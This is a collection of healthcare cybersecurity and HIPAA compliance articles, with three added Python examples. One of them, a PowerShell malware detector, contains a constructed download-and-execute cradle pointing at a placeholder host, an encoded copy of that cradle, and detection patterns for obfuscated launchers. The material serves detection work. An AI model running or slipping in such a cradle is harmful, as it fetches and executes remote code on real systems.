Healthcare Data Security

Is Google Voice HIPAA Compliant?

Google Voice is a popular telephony service, but is Google Voice HIPAA compliant or can it be used in a HIPAA compliant way? Is it possible for healthcare organizations – or healthcare employees – to use the service without risking a violation of HIPAA Rules?

Is Google Voice HIPAA Compliant?

Google Voice is a popular and convenient telephony service that includes voicemail, voicemail transcription to text, the ability to send text messages free of charge, and many other useful features. It is therefore unsurprising that many healthcare professionals would like to use the service at work, as well as for personal use.

In order for a service to be used in healthcare in conjunction with any protected health information (PHI) it must be possible to use it in a HIPAA compliant way.

That means the service must be covered by the conduit exemption rule – which was introduced when the HIPAA Omnibus Final Rule came into effect – or it must incorporate a range of controls and safeguards to meet the requirements of the HIPAA Security Rule.

As with SMS, faxing and email, Google Voice is not classed as a conduit which means that in order for Google Voice to be HIPAA compliant, the service would need to satisfy the requirements of the HIPAA Security Rule.

There would need to be access and authentication controls, audit controls, integrity controls, and transmission security for messages sent through the service. Google would also need to ensure that any data stored on its servers are safeguarded to the standards demanded by HIPAA. HIPAA-covered entities would also need to receive satisfactory assurances that this is the case, in the form of a HIPAA-compliant business associate agreement (BAA).

Therefore, before Google Voice could be used in conjunction with any protected health information, the covered entity must obtain a BAA from Google.

Will Google Sign A BAA for Google Voice?

Google is keen to encourage healthcare organizations to adopt its services, and is happy to sign a business associate agreement for G Suite, but Google does not include its free consumer services in that agreement. Google does not recommend that businesses use its free consumer services, as they have been developed specifically for personal use by consumers.

Google Voice is a consumer product and is not included in G Suite, Google Apps, or Google Cloud and neither is it mentioned in its BAA.

So is Google Voice HIPAA compliant? No. Until Google releases a version of Google Voice for businesses and includes it in its business associate agreement, it should not be used by healthcare organizations or healthcare employees in a professional capacity.

The use of Google Voice with any protected health information would be a violation of HIPAA Rules.

The post Is Google Voice HIPAA Compliant? appeared first on HIPAA Journal.

Cybersecurity Best Practices for Travelling Healthcare Professionals

In its December cybersecurity newsletter, the U.S. Department of Health and Human Services’ Office for Civil Rights (OCR) offered cybersecurity best practices for travelling healthcare professionals to help them prevent malware infections and the exposure of patients’ protected health information (PHI).

Many healthcare professionals will be travelling to see their families over the holidays and will be taking work-issued devices with them on their travels, which increases the risk to the confidentiality, integrity, and availability of PHI.

Using work-issued laptops, tablets, and mobile phones in the office or at home offers some protection from cyberattacks and malware infections. Using the devices to connect to the Internet at cafes, coffee shops, hotels, and other Wi-Fi access points increases the risk of a malware infection or man-in-the-middle attack. Even charging portable devices via public USB charging points at hotels and airports can see malware transferred.

Malware and cyberattacks can expose the data on the device, stolen login credentials can lead to a substantial data breach, and malware can be transferred to your organization’s network when you return to work.

Ensure Travel is Covered in Your Risk Analysis

HIPAA-covered entities and business associates must conduct a risk analysis to identify all risks to the confidentiality, integrity, and availability of PHI. The risk analysis must include the risks when healthcare professionals travel, be it on holiday or for business trips. Vulnerabilities and risks identified by the risk assessment must then be managed and reduced to an acceptable and appropriate level through a HIPAA-compliant risk management process.

OCR’s Suggested Cybersecurity Best Practices for Travelling Healthcare Professionals

The following cybersecurity best practices for travelling healthcare professionals are particularly relevant during the holiday season, but apply whenever work-issued devices are removed from the protection of a secured network.

Healthcare organizations that permit healthcare employees to remove work-issued devices should incorporate these cybersecurity best practices into their training programs and ensure all healthcare employees are made aware of the additional risks when travelling and how they can manage those risks.

Leave Portable Devices at the Office or at Home

If you don’t really need to take a work-issued device with you, leave it at home or at the office and make sure it is secured.

Ensure Devices are Fully Patched

All portable devices should be kept patched and up to date, but this becomes even more important when travelling and connecting to public Wi-Fi hotspots. Software, mobile apps, and operating systems should be updated to the latest versions.

Secure the Devices Using Strong Passwords

All devices should be secured with strong passwords. OCR suggests passwords should be more than 10 characters and should include numbers, letters (upper and lower case) and symbols. Passphrases can be used as they are difficult to guess but easy to remember. Multi-factor authentication should also be used if possible.

Activate Additional Security Controls

Activate additional security controls such as fingerprint readers on mobile phones to prevent data and account access in the event of loss or theft. This can buy you more time to secure accounts and change passwords if your device is stolen.

Encrypt all Sensitive Data on Your Devices

OCR suggests that laptop computers should have full disk encryption to ensure data cannot be accessed in the event of loss or theft, and that data should be removed from portable devices if it is not required.

Create Multiple Backups of Files

It is essential that data can be recovered in the event of loss or theft of a portable device or a ransomware attack. Multiple backups should ideally be created on another device with a copy also stored securely in the cloud.

Bring Portable Chargers, Power Cords and Adaptors

Connecting to public charging points in airports and hotels can easily introduce malware. Avoid USB charging points, and charge devices using a portable charging pack or by plugging into the mains supply. If charging ports must be used, only connect after devices have been powered down.

Avoid Public Wi-Fi Hotspots

Avoid all public Wi-Fi networks as they are unlikely to be secure. If you do need to connect to Wi-Fi when travelling, always connect to the Internet via a VPN.

Turn Off Auto Connect for Bluetooth and Wi-Fi

Ensure your portable devices do not automatically connect to Wi-Fi networks and turn off Bluetooth connectivity.

Use Different PIN Numbers

Always use a unique PIN number for each of your devices. Never reuse a PIN anywhere else, such as on the hotel safe.

Never Leave Devices Unprotected

If you cannot lock a portable electronic device in a safe, take it with you. Any possible hiding spot in a hotel room will be checked by thieves. Devices should only ever be taken in hand luggage, never packed in a case that is put in the hold.

Use Geo-Location with Care

While geolocation services have their uses, they can also alert thieves that you are not at home. Consider turning off these services on social media networks when you are away, and avoid posting photos taken on your travels until you return home.


Is Facebook Messenger HIPAA Compliant?

Is Facebook Messenger HIPAA compliant? Is it OK to use the messaging service to send protected health information without violating HIPAA Rules?

Many doctors and nurses communicate using chat platforms, but is it acceptable to use the platforms for sending PHI? One of the most popular chat platforms is Facebook Messenger. To help clear up confusion we will assess whether Facebook Messenger is HIPAA compliant and if the platform can be used to send PHI.

In order to use any service to send PHI, it must incorporate security controls to ensure information cannot be intercepted in transit. In short, messages need to be encrypted. Many chat platforms, including Facebook Messenger, do encrypt data in transit, so this aspect of HIPAA is satisfied. However, with Facebook Messenger, encryption is optional and users have to opt in. Provided that setting has been activated, only the sender and the receiver will be able to view the messages. However, there is more to HIPAA compliance than simply encrypting data in transit.

There must be access and authentication controls to ensure only authorized individuals can access the program. Facebook Messenger could be accessed by unauthorized individuals if a phone was stolen, so it would be necessary for the device to have additional security controls to ensure apps such as Facebook Messenger could not be accessed in the event of loss or theft. Facebook Messenger users don’t have to log in each time to view messages on the app.

HIPAA-covered entities must ensure there is an audit trail. Any PHI sent through a chat messaging platform would need to be retained and hardware, software or procedural mechanisms would be required to ensure any activity involving PHI could be examined. It would be difficult to maintain an audit trail on Facebook Messenger and there are also no controls to prevent messages from being deleted by users.

Is a Business Associate Agreement Required?

The HIPAA Conduit Exception allows HIPAA-covered entities to send information via certain services without the need for a business associate agreement. For example, it is not necessary to enter into a BAA with an Internet Service Provider (ISP) or the U.S. Postal Service. Those entities only act as conduits.

However, cloud service providers are not covered by that exception. HHS points this out on its website, saying “CSPs that provide cloud services to a covered entity or business associate that involve creating, receiving, or maintaining (e.g., to process and/or store) electronic protected health information (ePHI) meet the definition of a business associate, even if the CSP cannot view the ePHI because it is encrypted and the CSP does not have the decryption key.”

Facebook would therefore need to sign a BAA with a HIPAA-covered entity before Facebook Messenger could be used to communicate PHI, and at the time of writing, Facebook is not prepared to sign a BAA for its Messenger service.

How About Workplace by Facebook?

Workplace by Facebook is a messaging service that can be used by businesses to communicate internally. Is Workplace by Facebook HIPAA compliant? The Workplace Enterprise Agreement states under its prohibited data section, “You agree not to submit to Workplace any patient, medical or other protected health information regulated by HIPAA or any similar federal or state laws, rules or regulations (“Health Information”) and acknowledge that Facebook is not a Business Associate or subcontractor (as those terms are defined in HIPAA) and that Workplace is not HIPAA compliant.”

Is Facebook Messenger HIPAA Compliant?

Is Facebook Messenger HIPAA compliant? Without a BAA, and without appropriate audit and access controls, we do not believe Facebook Messenger is HIPAA compliant. If you want to use a chat program for communicating PHI, we suggest you use a HIPAA-compliant messaging service that has been developed specifically for the healthcare industry, TigerText for example. These secure healthcare text messaging solutions incorporate all the necessary controls to ensure PHI can be sent securely, and include access controls, audit controls, and full end-to-end encryption.


HIPAA Compliant Email Providers

HIPAA-covered entities must ensure protected health information (PHI) transmitted by email is secured to prevent unauthorized individuals from intercepting messages. Many choose to use HIPAA compliant email providers so that appropriate controls are applied to protect the confidentiality, integrity, and availability of PHI.

There are many HIPAA compliant email providers to choose from that provide end-to-end encryption for messages. Some of the solutions require software to be hosted on your own infrastructure; others take care of everything. Changing email provider does not necessarily mean you have to change your email addresses. Many services allow you to keep your existing email addresses and send messages as you normally would from your desktop.

All HIPAA compliant email providers must ensure their solution incorporates all of the safeguards required by the HIPAA Security Rule. The solutions need to have access controls (§164.312(a)(1)), audit controls (§164.312(b)), integrity controls (§164.312(c)(1)), and authentication (§164.312(d)), and PHI must be secured in transit (§164.312(e)(1)).

Provided that an email service provider incorporates all of those controls, the service can be considered HIPAA-compliant. However, it is also necessary for an email service provider to enter into a contract with a HIPAA-covered entity in the form of a business associate agreement. Only then can the email service be used.

HIPAA-covered entities should bear in mind that HIPAA-compliant email is not solely the responsibility of the service provider. The service provider must only ensure appropriate safeguards are incorporated. It is the responsibility of the covered entity to ensure the solution is configured correctly, that staff are trained in the use of email, and that they are made aware of the allowable uses and disclosures of PHI.

An email service alone will not satisfy all HIPAA requirements for email. Staff should also receive training on security awareness and be made aware of the threats that can arrive in inboxes. Technologies should also be implemented to reduce the risk of email-based attacks such as phishing. Some email service providers, but not all, scan inbound messages and block spam, malware and phishing emails.

Is Encryption for Email Mandatory?

That is a question asked by many healthcare organizations. While HIPAA compliant email providers encrypt all emails in transit, encryption is not mandatory. The HIPAA Security Rule only requires organizations to assess the need for encryption. A HIPAA-covered entity does not need to encrypt emails if an alternative and equivalent control is used in its place.

One such control is the use of a secure email server located behind a firewall. In such cases, provided a risk assessment has been conducted and the reasons for not encrypting emails have been documented, encryption would not be required on all internal emails. Encryption would also not be necessary when sending emails to patients who have authorized a covered entity to communicate with them via email.

However, since most healthcare organizations need to submit payment claims via email, contact other healthcare organizations and refer patients, it is necessary to send emails outside the protection of the firewall. In such cases, encryption is necessary.
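The decision described in the preceding paragraphs (internal mail behind the firewall may rely on the documented alternative control, patients who have authorized unencrypted email may receive it, everything else carrying PHI must be encrypted) can be written down as a policy check. The following is an added example, not code from HIPAA Journal or any email provider; the domains, addresses, and function names are constructed assumptions.

```python
"""Outbound email encryption policy check.

Added example, not code from HIPAA Journal or any email provider. It assumes
the covered entity has documented, per its risk assessment, that mail staying
on its own mail system behind the firewall may go unencrypted, and that it
keeps a list of patients who have authorized plain email. Every other
recipient of a message containing PHI requires encryption. The domains,
addresses and helper names below are constructed.
"""
from dataclasses import dataclass, field

# Mail domains served by the entity's own server behind the firewall (constructed)
INTERNAL_DOMAINS = {"clinic.example"}

# Patients who have authorized communication by unencrypted email (constructed)
PATIENT_PLAIN_EMAIL_CONSENT = {"patient.one@mail.example"}


@dataclass
class TransportDecision:
    encrypt_required: bool
    reasons: list = field(default_factory=list)


def domain_of(address: str) -> str:
    """Lower-cased domain part of an address; a malformed address yields ''."""
    local, sep, domain = address.rpartition("@")
    return domain.lower() if sep and local else ""


def is_internal(address: str) -> bool:
    """True for the entity's own domain or any subdomain of it."""
    domain = domain_of(address)
    return any(domain == d or domain.endswith("." + d) for d in INTERNAL_DOMAINS)


def classify_recipient(address: str) -> str:
    """internal | patient-consented | external | invalid."""
    if not domain_of(address):
        return "invalid"
    if is_internal(address):
        return "internal"
    if address.lower() in PATIENT_PLAIN_EMAIL_CONSENT:
        return "patient-consented"
    return "external"


def decide_transport(recipients, contains_phi: bool) -> TransportDecision:
    """One decision for the whole message: a single external (or malformed,
    which fails closed) recipient means the message as a whole is encrypted."""
    if not contains_phi:
        return TransportDecision(False, ["message contains no PHI"])
    decision = TransportDecision(False)
    for addr in recipients:
        kind = classify_recipient(addr)
        if kind in ("external", "invalid"):
            decision.encrypt_required = True
            decision.reasons.append(f"{addr}: {kind} recipient, encryption required")
        elif kind == "internal":
            decision.reasons.append(f"{addr}: internal, covered by documented alternative control")
        else:
            decision.reasons.append(f"{addr}: patient has authorized unencrypted email")
    return decision


if __name__ == "__main__":
    for rcpts in (["dr.smith@clinic.example"],
                  ["dr.smith@clinic.example", "referral@otherhospital.example"],
                  ["patient.one@mail.example"]):
        d = decide_transport(rcpts, contains_phi=True)
        print("ENCRYPT" if d.encrypt_required else "plain  ", "|", "; ".join(d.reasons))
```

The check is deliberately per-message rather than per-recipient: a referral CC'd alongside an internal colleague still forces encryption of the whole message, which is the behaviour a mail gateway rule should have.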

There are considerable risks in sending sensitive information via email. Email is not a secure way of sending data. An email is created on one machine, sent to an outbound email server, traverses the Internet, and arrives at the recipient’s email server before being delivered to the recipient’s device. Copies of the email can therefore exist on at least four different machines, and messages can easily be intercepted in transit.

The Department of Health and Human Services has already issued fines to covered entities that have used email services that are not HIPAA compliant. Phoenix Cardiac Surgery paid a $100,000 penalty for using insecure Internet-based email.

List of HIPAA Compliant Email Providers

Our list of HIPAA compliant email providers has been compiled to save you time in your search for a suitable email service provider. The list of HIPAA compliant email providers is not exhaustive. There are many other service providers that offer email services for healthcare organizations that meet the requirements of HIPAA. However, the list below is a good starting point.

All of the following providers offer a HIPAA-compliant email service and are willing to sign a business associate agreement.

  • Hushmail for Healthcare
  • VM Racks
  • NeoCertified
  • Paubox
  • Virtru
  • Atlantic
  • LuxSci
  • Apsida Mail
  • Protected Trust
  • MaxMD
  • EmailPros
  • MD OfficeMail
  • Delivery Trust from Identillect Technologies


Protenus Releases November Healthcare Data Breach Report

Protenus has released its November healthcare data breach report – a summary of healthcare data breaches reported by HIPAA-covered entities. The report shows there has been a month on month fall in healthcare data breaches, and a major reduction in the number of records exposed by data breaches.

November saw the lowest total of the year to date for breaches with 28 incidents included in the report – four incidents fewer than February, the previous best month when 32 breaches were reported. This is the second consecutive month when reported breaches have fallen. There were 46 breaches reported in September and 37 in October.

November was also the best month of the year in terms of the number of records exposed. 83,925 individuals were impacted by healthcare data breaches in November. The previous lowest total was May, when 138,957 records were exposed. November was the third consecutive month where the number of breached records fell.

While the November healthcare data breach report offers some good news, the fall in breaches and breached records should be taken with a large pinch of salt. Healthcare organizations have a maximum of 60 days to report breaches, so the figures do not indicate there has been a reduction in incidents. Also, figures have only been obtained for 25 of the 28 breaches. As Kira Caban, Director of Public Relations at Protenus, notes, “The number of both data breach incidents and affected patient records are lower than any other month thus far in 2017, but it may also just indicate that people wanted to get ready for Thanksgiving, so they delayed reporting.”

In November, insider breaches outnumbered hacking incidents, with nine incidents (32%) due to insiders and eight incidents (28%) attributed to hacking. 25% of breaches involved the loss or theft of records or devices containing ePHI. Seven of the breaches involved paper records.

The November healthcare data breach report shows hacking incidents resulted in the highest number of exposed records, by a nose: 36,804 records. Insider incidents resulted in the exposure of 36,447 records: 27,228 due to insider error and 9,219 due to insider wrongdoing. 5,324 records were exposed due to the theft or loss of physical records or devices containing unencrypted ePHI.

As is typical, healthcare providers reported the most breaches (82.1%), followed by health plans (10.7%). Three incidents (3.6%) are known to have involved business associates of HIPAA-covered entities.

It is difficult to make a determination whether healthcare organizations managed to discover breaches more quickly, as figures were only available for four incidents. The average time to detect a breach was 55 days, with a median of 33 days. One breach took 153 days to discover.

The data are more complete for the time taken to report breaches. The median time to report the incidents to HHS was 57 days, with an average of 61 days. The figures show healthcare organizations are still waiting until the last minute to report breaches. It should be noted that while HIPAA allows up to 60 days to report data breaches, incidents should be reported without unnecessary delay, and well within that 60-day window. At least three covered entities have risked a financial penalty for delayed breach notifications, with one taking 134 days to report the breach.
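The roll-up figures above (mean and median days to report, category shares, and the 60-day outer limit) are the kind of thing a privacy officer should compute from the organization's own incident register rather than read only in an industry report. The following is an added example, not code from Protenus or HIPAA Journal; the incident rows are constructed, not figures from the report, and the function names are my own.

```python
"""Breach notification timeline tracker.

Added example, not code from Protenus or HIPAA Journal. It assumes an
in-house incident register that records when each breach was discovered
and when it was reported to HHS; the rows below are constructed, not
figures from the report, and all function names are my own.
"""
from datetime import date, timedelta
from statistics import mean, median

# Breach Notification Rule outer limit: no later than 60 calendar days after discovery
HIPAA_REPORTING_DEADLINE_DAYS = 60

# Constructed sample register: (incident id, category, discovered, reported to HHS)
SAMPLE_INCIDENTS = [
    ("INC-001", "hacking",    date(2017, 9, 1),   date(2017, 10, 27)),  # 56 days
    ("INC-002", "insider",    date(2017, 9, 15),  date(2017, 11, 13)),  # 59 days
    ("INC-003", "loss/theft", date(2017, 8, 1),   date(2017, 12, 13)),  # 134 days
    ("INC-004", "hacking",    date(2017, 10, 20), date(2017, 11, 10)),  # 21 days
    ("INC-005", "paper",      date(2017, 10, 1),  date(2017, 12, 1)),   # 61 days
]


def days_to_report(discovered: date, reported: date) -> int:
    """Calendar days between discovery and the HHS notification."""
    if reported < discovered:
        raise ValueError("reported date precedes discovery date")
    return (reported - discovered).days


def notification_due(discovered: date) -> date:
    """Last calendar day on which notification is still within the 60-day window."""
    return discovered + timedelta(days=HIPAA_REPORTING_DEADLINE_DAYS)


def is_late(discovered: date, reported: date) -> bool:
    """True when the report went out after the 60-day outer limit."""
    return days_to_report(discovered, reported) > HIPAA_REPORTING_DEADLINE_DAYS


def summarize(incidents) -> dict:
    """The roll-up a monthly breach report gives: incident count, share by
    category, mean/median days to report, and the late filers."""
    durations = [days_to_report(d, r) for _, _, d, r in incidents]
    by_category = {}
    for _, category, _, _ in incidents:
        by_category[category] = by_category.get(category, 0) + 1
    shares = {c: round(100 * n / len(incidents), 1) for c, n in by_category.items()}
    late = [iid for iid, _, d, r in incidents if is_late(d, r)]
    return {
        "count": len(incidents),
        "by_category": by_category,
        "category_share_pct": shares,
        "mean_days": mean(durations),
        "median_days": median(durations),
        "late": late,
    }


if __name__ == "__main__":
    report = summarize(SAMPLE_INCIDENTS)
    print(f"{report['count']} incidents; mean {report['mean_days']:.1f} days, "
          f"median {report['median_days']} days to report")
    for iid, _, d, r in SAMPLE_INCIDENTS:
        flag = "LATE" if is_late(d, r) else "ok"
        print(f"{iid}: {days_to_report(d, r):>3} days (due {notification_due(d)}) {flag}")
```

Run against a live register, `notification_due` is the value to alarm on for incidents that are still open, since the "without unreasonable delay" standard is measured from discovery, not from when the investigation finished.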

While California is usually the state with the most reported breaches, that unenviable accolade was taken by Kentucky in November, with three reported breaches. Healthcare organizations based in Massachusetts, Texas, Colorado, Indiana, Florida, and California each reported two breaches.


New Malware Detections at Record High: Healthcare Most Targeted Industry

Throughout 2017, the volume of new malware samples detected by McAfee Labs has been steadily rising each quarter, reaching a record high in Q3 when 57.6 million new malware samples were detected. On average, in Q3 a new malware sample was detected every quarter of a second.

In the United States, the healthcare industry continues to be the most targeted vertical, which along with the public sector accounted for more than 40% of total security incidents in Q3. In Q3, account hijacking was the main attack vector, followed by leaks, malware, DDoS, and other targeted attacks.

There were similar findings from the recent HIMSS Analytics/Mimecast survey, which showed email-related phishing attacks were the greatest cause of concern among healthcare IT professionals, with email the leading attack vector.

In Q3, globally there were 263 publicly disclosed security breaches – a 15% increase from last quarter – with more than 60% of those breaches occurring in the Americas. Malware attacks increased 10% since last quarter bringing the total new malware samples in the past four quarters to 781 million – a 27% increase in the space of a year.

Ransomware continues to be a favored moneymaker for cybercriminals, with the number of new ransomware samples increasing by 36% in Q3 – 14% more than the previous quarter. In total, 12.2 million samples of ransomware were detected – a 44% increase over the past four quarters. One notable ransomware variant was Lukitus – a new form of Locky ransomware that appeared in Q3. The campaign detected by McAfee involved an astonishing 23 million spam emails in the first 24 hours alone.

While not the biggest threat in Q3, fileless malware threats are still a major cause for concern. Script-based malware – written in VBS, JavaScript, PowerShell or PHP – has been steadily increasing over the past two years. The malware is easy to obfuscate and difficult to detect, and is increasingly being used in malware campaigns, with some campaigns consisting entirely of script-based malware.

McAfee reports that while there was a 36% fall in JavaScript malware since Q2, the level is still higher than at any point in 2016, and Q3 saw a 119% increase in PowerShell malware.
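Script-based malware is hard to catch on disk, but its launch leaves traces in process-creation telemetry: the command line that started the interpreter. The following is an added example of that detection logic, not code from McAfee or HIPAA Journal. It assumes the analyst has command-line logging (Sysmon process-creation events or EDR telemetry), scores each line on launcher tricks commonly seen with malicious PowerShell (hidden window, bypassed execution policy, no profile, an encoded command, download-and-execute cradles), and decodes the `-EncodedCommand` payload so the obfuscated variant is scored like the plain one. The log lines and the threshold are constructed.

```python
"""Scoring process command lines for script-based (PowerShell) malware.

Added example, not code from McAfee or HIPAA Journal. Assumes process
command lines are available from logging (e.g. Sysmon process creation or
EDR telemetry). Indicator weights and the threshold are constructed and
should be tuned against an environment's own admin usage.
"""
import base64
import re

# (name, weight, pattern) applied to the raw command line
LAUNCH_INDICATORS = [
    ("hidden_window",      2, re.compile(r"\s-w(?:indowstyle)?\s+hidden\b", re.I)),
    ("no_profile",         1, re.compile(r"\s-nop(?:rofile)?\b", re.I)),
    ("exec_policy_bypass", 2, re.compile(r"\s-e(?:xecutionpolicy|p)\s+bypass\b", re.I)),
    ("encoded_command",    2, re.compile(r"\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)),
]

# applied to the raw line AND to the decoded -EncodedCommand payload
CONTENT_INDICATORS = [
    ("invoke_expression", 2, re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("download_cradle",   3, re.compile(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest", re.I)),
    ("base64_decode",     1, re.compile(r"frombase64string", re.I)),
]

SUSPICIOUS_THRESHOLD = 4  # constructed; a lone -NoProfile is normal admin usage


def decode_encoded_command(b64: str):
    """PowerShell's -EncodedCommand carries UTF-16LE text in base64."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_command_line(line: str) -> dict:
    """Score one command line; returns score, matched indicators, decoded payload."""
    score, hits, decoded = 0, [], None
    for name, weight, pattern in LAUNCH_INDICATORS:
        m = pattern.search(line)
        if m:
            score += weight
            hits.append(name)
            if name == "encoded_command":
                decoded = decode_encoded_command(m.group(1))
    texts = [line] + ([decoded] if decoded else [])
    for name, weight, pattern in CONTENT_INDICATORS:
        if any(pattern.search(t) for t in texts):
            score += weight
            hits.append(name)
    return {"score": score, "indicators": hits, "decoded": decoded,
            "suspicious": score >= SUSPICIOUS_THRESHOLD}


def find_suspicious(lines) -> list:
    """Indices of the lines that cross the threshold, for triage."""
    return [i for i, line in enumerate(lines) if score_command_line(line)["suspicious"]]


# Constructed samples: one benign scheduled task, one plaintext download
# cradle, and the same cradle hidden behind -EncodedCommand (host is the
# reserved .invalid TLD, so it resolves nowhere).
STAGER_SAMPLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"
ENCODED_SAMPLE = base64.b64encode(STAGER_SAMPLE.encode("utf-16le")).decode("ascii")

SAMPLE_LOG = [
    r"powershell.exe -NoProfile -File C:\Scripts\nightly-backup.ps1",
    'powershell.exe -w hidden -ep bypass -c "' + STAGER_SAMPLE + '"',
    "powershell.exe -nop -w hidden -enc " + ENCODED_SAMPLE,
]


if __name__ == "__main__":
    for line in SAMPLE_LOG:
        r = score_command_line(line)
        tag = "SUSPICIOUS" if r["suspicious"] else "ok"
        print(f"[{tag:10}] score={r['score']:2} {r['indicators']}")
        if r["decoded"]:
            print("            decoded:", r["decoded"])
```

The benign line scores 1 (only `-NoProfile`), while both cradles score well past the threshold with the same content indicators, which is the point: decoding the payload before matching is what keeps the obfuscated variant from slipping under a rule that only looks at the raw command line.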

“Although many cyberattacks continue to rely on the exploitation of basic security vulnerabilities, exposures, and user behaviors, fileless threats leverage the utility of our own system capabilities,” said Vincent Weafer, Vice President for McAfee Labs. “By leveraging trusted applications or gaining access to native system operating tools such as PowerShell or JavaScript, attackers have made the development leap forward to take control of computers without downloading any executable files, at least in the initial stages of the attack.”

There was also a notable rise in mobile malware, with 21.1 million samples detected – 10% higher than Q2. The increase was largely due to a major rise in Android screen-locking ransomware variants. Macro malware increased by 8% in Q3, while Mac malware saw an increase of 7%. Web-based threats also increased significantly in Q3.

While malware continues to be a major threat, Carbon Black’s 2017 Threat Report indicates 52% of attacks are non-malware related. Non-malware attacks are now increasing at a rate of 6.8% per month.

Financial services, healthcare providers, and retail were the verticals most affected by malware-related cyberattacks in 2017, according to Carbon Black. The main threats are the Kryptik Trojan, Strictor ransomware, the Nemucod downloader, the Emotet banking Trojan, and the Skeeyah Trojan. Carbon Black reports a 328% increase in attacks on endpoints in 2017 alone.

While the healthcare industry has had its fair share of ransomware attacks, it is well down the list of industries targeted with ransomware, coming in 9th out of 10 industries with just 4.6% of the total. The leading targets were tech firms, government organizations/NPOs and legal firms.

Ransomware will continue to be the dominant form of cybercrime in 2018, according to the report. Carbon Black estimates revenues from ransomware will rise to $5 billion by the end of the year, compared to just $24 million in 2015.


More than 1,000 Lexmark Printers Open to Attack Due to Misconfiguration

Researchers at NewSky Security have discovered more than a thousand Lexmark printers have been misconfigured by users and are accessible over the Internet. Many of the printers are used by businesses, universities, and even the U.S. Government, yet they can be accessed via the Internet without the need for a password.

The lack of security means unauthorized individuals can connect to the printers, which in some cases are connected to sensitive networks. Attacking those printers requires no skill and is a quick and easy process. Any individual can remotely access and take full control of the device. It would be possible for anyone to set a password for the printer, add a backdoor and capture print jobs. NewSky Security says the lack of an administrator password is gross negligence by users.

The researchers identified the misconfigured Lexmark printers by performing a search on the search engine Shodan. Of the 1,475 unique IPs found, 1,123 printers had no security at all and only 24% redirected the researchers to a login page. The researchers explained, “an attacker can take control of these poorly configured devices without any impressive hacking skills.”

One of the unsecured printers was being used by the Lafayette Consolidated Government, with the majority belonging to universities. NewSky is currently reaching out to organizations affected to alert them to the problem.

The researchers explained that they have focused on printer security because it is still largely neglected by end users.

This is not the first time printer misconfigurations have been discovered by the researchers. Similar misconfigurations were identified on Brother printers in October, which saw administrative panels accessible over ports 80 and 443.

It is possible that many other brands of Internet-enabled printers are similarly exposed. Organizations that have purchased Internet-enabled printers should ensure that the devices are configured correctly, that they are isolated from the public Internet, that default passwords are changed, and strong admin passwords set on the devices. Open ports should be closed and unnecessary services stopped.


AHIMA Issues Guidance to Help Healthcare Organizations Develop an Effective Cybersecurity Plan

The American Health Management Association (AHIMA) has published guidance to help healthcare organizations develop a comprehensive and effective cybersecurity plan.

In the guidance, AHIMA explains that healthcare organizations must develop, implement and maintain an organization-wide framework for managing information through its entire lifecycle, from its creation to its safe and secure disposal – a practice termed information governance (IG).

As the Protenus/Databreaches.net monthly healthcare data breach reports show, healthcare data breaches are now occurring at a rate of more than one a day. With the threat of attack greater than ever before, it is essential that healthcare organizations develop an IG program.

Kathy Downing, Vice President, Information Governance, Informatics, Privacy and Security at AHIMA, explains that IG is now critical in an environment where cyberattacks are being experienced by healthcare organizations every day.

Downing cites the June 2017 report from the Healthcare Industry Cybersecurity Taskforce (HCIC), which states “Information governance includes not just IT and security stakeholders, but also information stakeholders, clinical and nonclinical leaders.” HCIC explained, “Governance of information shifts the focus from technology to people, processes, and the policies that generate, use, and manage the data and information required for care.”

To help healthcare organizations develop, implement, and maintain an effective IG program, AHIMA has developed a step-by-step guide, which includes 17 actions healthcare organizations can take to complete a cybersecurity plan.

The AHIMA IG Adoption Model™ addresses people, processes, and technology and has been based on ten competency areas, including privacy and security, enterprise information management, IT and data governance, legal and regulatory requirements, and security awareness and adherence.

By developing and maintaining a cybersecurity plan, healthcare organizations can improve their defenses against cyberattacks and prevent costly data breaches.

The 17 steps to develop a complete cybersecurity plan are:

  1. Conduct a comprehensive, organization-wide risk analysis of all applications and systems
  2. Recognize health record retention as a cybersecurity issue
  3. Patch all vulnerable systems and keep software/operating systems up to date
  4. Deploy advanced endpoint detection systems in addition to standard antivirus/antimalware tools
  5. Encrypt data on workstations, smartphones, tablets and portable media
  6. Improve access management and identity controls
  7. Use web filters to block bad traffic
  8. Implement mobile device management
  9. Develop an incident response plan
  10. Monitor audit logs for signs of possible attacks
  11. Implement intrusion detection systems
  12. Evaluate business associates
  13. Use a third-party firm to conduct penetration tests
  14. Improve anti-phishing controls and conduct phishing simulation exercises
  15. Prepare a ‘State of the Union’ type presentation for an organization’s leaders on cybersecurity
  16. Adopt and apply a ‘Defense in Depth’ strategy
  17. Detect and prevent intrusions

Developing and implementing a cybersecurity plan is only the start. The threat landscape is constantly changing, and healthcare organizations’ IT infrastructures, hardware and software frequently change. It is therefore important to revisit and revise the cybersecurity plan, as appropriate, at least every quarter to ensure it remains comprehensive and effective.

The AHIMA guidance is available for download here.


Medicaid Billing Company Settles Data Breach Case with Mass. Attorney General for $100,000

A data breach experienced by New Hampshire-based Multi-State Billing Services (MBS) has resulted in a $100,000 settlement with the Massachusetts attorney general’s office.

MBS is a Medicaid billing company that provides processing services for 13 public school districts in Massachusetts – Ashburnham-Westminster Regional, Bourne, Foxboro Regional Charter, Milford, Nauset Public Schools, Norfolk, Northborough-Southborough Regional, Plainville, Sutton, Truro, Uxbridge, Wareham, and Whitman-Hanson Regional.

In 2014, MBS learned that a password-protected, unencrypted laptop computer containing the sensitive personal information of Medicaid recipients had been stolen from a company employee. Data stored on the device included names, Social Security numbers, Medicaid numbers, and birth dates. As a result of the laptop theft, more than 2,600 Massachusetts children had their sensitive information exposed.

Following the data breach, MBS notified all affected individuals and offered to reimburse costs related to security freezes for three years following the breach. Security was also enhanced, including the use of encryption on all portable computers used to store the sensitive information of Medicaid recipients.

The Massachusetts attorney general’s office investigated the breach and determined that insufficient protections had been employed to ensure this type of breach did not occur. Under state law, companies doing business in Massachusetts must take “reasonable steps to safeguard the personal information from unauthorized access or use.” Had those measures been implemented prior to the laptop theft, a breach of sensitive information could have been avoided.

Specifically, MBS had failed to develop, implement, and maintain a written information security program, and did not ensure sensitive personal information stored on portable electronic devices was encrypted. MBS had also failed to train staff how to reasonably safeguard personal information.

